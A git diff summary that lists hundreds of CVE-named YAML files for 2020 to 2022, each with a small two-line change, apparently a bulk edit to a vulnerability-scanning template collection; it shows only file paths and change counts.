http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15568.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-16139.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 2 +- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17519.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 2 +- http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-1956.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-21012.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-22211.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 2 +- http/cves/2020/CVE-2020-24579.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 2 +- http/cves/2020/CVE-2020-25506.yaml | 2 +- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-25864.yaml | 2 +- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-26948.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27838.yaml | 2 +- http/cves/2020/CVE-2020-27866.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28188.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 2 +- http/cves/2020/CVE-2020-29284.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29583.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 2 +- http/cves/2020/CVE-2020-35234.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35713.yaml | 2 +- http/cves/2020/CVE-2020-35736.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 2 +- http/cves/2020/CVE-2020-35847.yaml | 2 +- http/cves/2020/CVE-2020-35848.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-4463.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5192.yaml | 2 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 2 +- http/cves/2020/CVE-2020-6207.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 2 +- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9315.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21307.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 2 +- http/cves/2021/CVE-2021-21351.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21803.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-22005.yaml | 2 +- http/cves/2021/CVE-2021-22053.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22145.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-22986.yaml | 2 +- http/cves/2021/CVE-2021-24145.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 2 +- http/cves/2021/CVE-2021-24285.yaml | 2 +- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24347.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24495.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24647.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24915.yaml | 2 +- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24947.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-25003.yaml | 2 +- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25299.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 2 +- http/cves/2021/CVE-2021-26294.yaml | 2 +- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26598.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 2 +- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27124.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27561.yaml | 2 +- http/cves/2021/CVE-2021-27651.yaml | 2 +- http/cves/2021/CVE-2021-27670.yaml | 2 +- http/cves/2021/CVE-2021-27850.yaml | 2 +- http/cves/2021/CVE-2021-27905.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28164.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 2 +- http/cves/2021/CVE-2021-29200.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29490.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30134.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-3017.yaml | 2 +- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-31195.yaml | 2 +- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31755.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 2 +- http/cves/2021/CVE-2021-32853.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33221.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35395.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 2 +- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36450.yaml | 2 +- http/cves/2021/CVE-2021-3654.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36748.yaml | 2 +- http/cves/2021/CVE-2021-37304.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 2 +- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 2 +- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37704.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38540.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40323.yaml | 2 +- http/cves/2021/CVE-2021-40438.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40651.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40870.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40908.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41291.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41432.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41749.yaml | 2 +- http/cves/2021/CVE-2021-4191.yaml | 2 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 2 +- http/cves/2021/CVE-2021-42887.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43421.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 2 +- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43798.yaml | 2 +- http/cves/2021/CVE-2021-43810.yaml | 2 +- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 2 +- http/cves/2021/CVE-2021-44139.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 2 +- http/cves/2021/CVE-2021-44228.yaml | 2 +- http/cves/2021/CVE-2021-44427.yaml | 2 +- http/cves/2021/CVE-2021-44451.yaml | 2 +- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45046.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45232.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45428.yaml | 2 +- http/cves/2021/CVE-2021-45968.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46069.yaml | 2 +- http/cves/2021/CVE-2021-46071.yaml | 2 +- http/cves/2021/CVE-2021-46072.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46418.yaml | 2 +- http/cves/2021/CVE-2021-46419.yaml | 2 +- http/cves/2021/CVE-2021-46422.yaml | 2 +- http/cves/2021/CVE-2021-46424.yaml | 2 +- http/cves/2021/CVE-2021-46704.yaml | 2 +- http/cves/2022/CVE-2022-0087.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 2 +- http/cves/2022/CVE-2022-0281.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0415.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0424.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0814.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0824.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0899.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1007.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1442.yaml | 2 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1580.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1903.yaml | 2 +- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21587.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 2 +- http/cves/2022/CVE-2022-2185.yaml | 2 +- http/cves/2022/CVE-2022-2187.yaml | 2 +- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- 